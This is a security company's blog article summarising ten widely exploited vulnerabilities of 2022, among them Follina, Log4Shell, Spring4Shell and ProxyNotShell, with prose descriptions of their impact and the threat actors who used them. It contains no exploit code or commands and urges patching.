Top 10 Exploited Vulnerabilities in 2022
With each passing year, hacker attacks become more advanced and sophisticated, so keeping up with security vulnerabilities is now more crucial than ever. This article highlights some of the most dangerous vulnerabilities exploited by malicious actors in 2022.
Disclosed (and patched) in May 2022, CVE-2022-30190 (informally known as “Follina”) is a remote code execution bug in Microsoft Windows Support Diagnostic Tool (MSDT), which allows a remote attacker to execute arbitrary shell commands on the target system.
Since its public disclosure, security researchers observed numerous cases involving the exploitation of the flaw, including multiple phishing attacks by Russia-linked threat actors (Sandworm, UAC-0098, APT28) targeting organizations and government agencies in Ukraine designed to infect victims with info-stealing malware, and cyber-espionage campaigns aimed at European and US governments. The Follina vulnerability has also been exploited to plant remote access tools like Qbot and AsyncRAT and deploy backdoors on Windows systems.
Despite being disclosed at the end of 2021, the Log4Shell flaw is still ranked high on the list of the most-exploited vulnerabilities and is still one the most commonly discussed vulnerabilities among cyber criminals on underground forums.
CVE-2021-44228 is a remote code execution flaw in a popular Apache Log4j open-source logging utility. By exploiting the flaw, a threat actor can send a specially-crafted command to an affected system, execute a malicious code, and take over the victim’s machine. Since December 2021, the now-fixed Log4Shell bug has been actively exploited by multiple threat actors, ranging from crypto miners, DDoS botnets, ransomware gangs and initial access brokers to state-backed hackers linked to governments in China, Iran, North Korea, and Turkey.
More recently, threat actors have been observed using Log4Shell to deploy malware on unpatched, public-facing VMware Horizon and Unified Access Gateway servers.
CVE-2022-22965 (Spring4Shell, SpringShell) is a remote code execution vulnerability in Spring Framework, a widely-used open source Java framework from VMware, named after the above mentioned Log4Shell flaw. Once attackers achieve remote code execution, they can install malware or can use the affected server as an initial foothold to escalate privileges and compromise the whole system.
While not as widespread as Log4Shell and not trivial to exploit, organizations shouldn't take Spring4Shell lightly, as it has already been weaponized by cyber criminals to deploy cryptocurrency miners, and by botnets powered by the infamous Mirai malware.
F5 BIG-IP (CVE-2022-1388)
First disclosed in May, 2022, CVE-2022-1388 is another critical bug worth paying attention to. The flaw affects the BIG-IP iControl REST authentication component within F5 BIG-IP suite of software and hardware, and, if exploited, allows an unauthenticated attacker to execute commands on BIG-IP network devices with “root” privileges. Over the past months, researchers spotted multiple attempts to exploit the vulnerability in attacks designed to wipe devices, or drop web shells.
Google Chrome zero-day (CVE-2022-0609)
The now patched CVE-2022-0609 is a remote code execution flaw in Google Chrome’s animation component that was leveraged in two separate North Korea-linked hacker campaigns, dubbed “Operation Dream Job” and “Operation AppleJeus”, that targeted several organizations in the media, IT, cryptocurrency, and financial-technology (FinTech) industries located in the United States.
Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
The “ancient” Microsoft Office remote code execution vulnerability (CVE-2017-11882), first disclosed in 2017, still remains among the most talked-about flaws on hacker forums. Although Microsoft released an official patch for CVE-2017-11882 almost five years ago, many organizations still haven’t applied it, presenting an opening for cyber criminals seeking for an exploitable foothold. In one of the recent cases threat actors have been observed taking advantage of the unpatched vulnerability to deploy the SmokeLoader malware in order to deliver additional malware, such as TrickBot.
ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
The moniker “ProxyNotShell” refers to two high-severity vulnerabilities, tracked as CVE-2022-41082 and CVE-2022-41040, that allow a remote user with access to PowerShell Remoting execute arbitrary code on vulnerable Exchange systems or execute SSRF attacks. First disclosed in September 2022, the flaws are said to have been exploited by hackers for several months. Microsoft confirmed that the ProxyNotShell bugs have been used by China-linked state-backed hackers to deploy China Chopper web shells on compromised Exchange servers. Both flaws were addressed as part of the Microsoft November 2022 Patch Tuesday release.
Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
Earlier this year, security researchers brought to public attention two vulnerabilities (CVE-2022-27925, CVE-2022-41352) impacting Zimbra Collaboration Suite (ZCS), a widely-used email and collaboration platform. CVE-2022-27925 allows to achieve remote code execution, while CVE-2022-41352 could be leveraged to upload arbitrary files to vulnerable instances. Between July and October, 2022, researchers detected multiple attacks, including by nation-state hackers, leveraging these vulnerabilities to breach thousands of ZCS servers worldwide.
Atlassian Confluence RCE flaw (CVE-2022-26134)
Servers running Atlassian Confluence software are an attractive target for cyber criminals because, if left unpatched, they could provide initial access to a corporate network, so securing them is very important. In June, several botnets, including Kinsing, Hezb, and Dark.IoT, were observed using a remote execution Atlassian Confluence flaw (CVE-2022-26134) to deploy cryptomining malware on unpatched installations.
Zyxel RCE vulnerability (CVE-2022-30525)
Another critical bug worth paying attention to is CVE-2022-30525 - an OS command injection issue affecting Zyxel firewall and VPN devices for businesses. Successful exploitation of the flaw allows an attacker to inject arbitrary commands remotely without authentication. Given the severity of the security issue and the damage it could lead to NSA Cybersecurity Director Rob Joyce took to Twitter to warn users about exploitation attempts urging them to update their Zyxel software if it is vulnerable.
- Follow ImmuniWeb on Twitter and LinkedIn
- Explore 20 use cases how ImmuniWeb can help
- Browse open positions to join our great Team
- See the benefits of our partner program
- Request a demo, quote or special price
- Subscribe to our newsletter